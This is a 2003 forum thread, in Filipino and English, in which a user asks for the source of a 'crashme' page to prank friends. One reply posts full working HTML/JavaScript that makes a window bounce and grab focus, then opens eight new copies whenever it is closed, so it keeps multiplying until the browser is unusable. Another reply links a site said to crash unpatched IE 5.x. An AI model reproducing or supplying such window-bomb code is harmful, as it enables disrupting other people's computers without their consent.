|
request
May 16, 2003 11:42:13 GMT -5
Post by fr33ag3nt on May 16, 2003 11:42:13 GMT -5
guys baka may source code kayo ng ganitong site "ww*.raus.de/crashme" gusto ko lang gumawa ng ganyan pang goyo sa mga friends ko. hehehhe
|
|
|
request
May 16, 2003 20:32:22 GMT -5
Post by PatingSaDagat on May 16, 2003 20:32:22 GMT -5
<html> <head> <script type="text/javascript"> var xOff=5; var yOff=5; var xPos=400; var yPos=-100; var flagRun=1; function openWindow(){ window.open('***put the filename of this file***','_blank','menubar=no,status=no,toolbar=no,resizable=no,width=90,height=60,titlebar=no,alwaysRaised=yes'); } function proCreate(){ openWindow(); openWindow(); openWindow(); openWindow(); openWindow(); openWindow(); openWindow(); openWindow(); } function newXlt(){ xOff=Math.ceil(0-6*Math.random())*5-10; } function newXrt(){ xOff=Math.ceil(7*Math.random())*5-10; } function newYup(){ yOff=Math.ceil(0-6*Math.random())*5-10; } function newYdn(){ yOff=Math.ceil(7*Math.random())*5-10; } function fOff(){ flagRun=0; } function playBall(){ xPos+=xOff; yPos+=yOff; if(xPos>screen.width-175){ newXlt(); } if(xPos<0){ newXrt(); } if(yPos>screen.height-100){ newYup(); } if(yPos<0){ newYdn(); } if(flagRun==1){ window.moveTo(xPos,yPos); window.focus();setTimeout('playBall()',1); } }</script> </head><body onload="playBall()" onunload="proCreate()"> </body> </html>
|
|
|
request
May 19, 2003 8:32:14 GMT -5
Post by hackfinn on May 19, 2003 8:32:14 GMT -5
try mo din tong link nato:
htt*://pnoyunderground.proboards18.com/index.cgi?board=general&action=display&thread=1051521245
simple lang yung source code...
htt*://ieti.virtualave.net <- visit this to crash unpatched ie5.x
|
|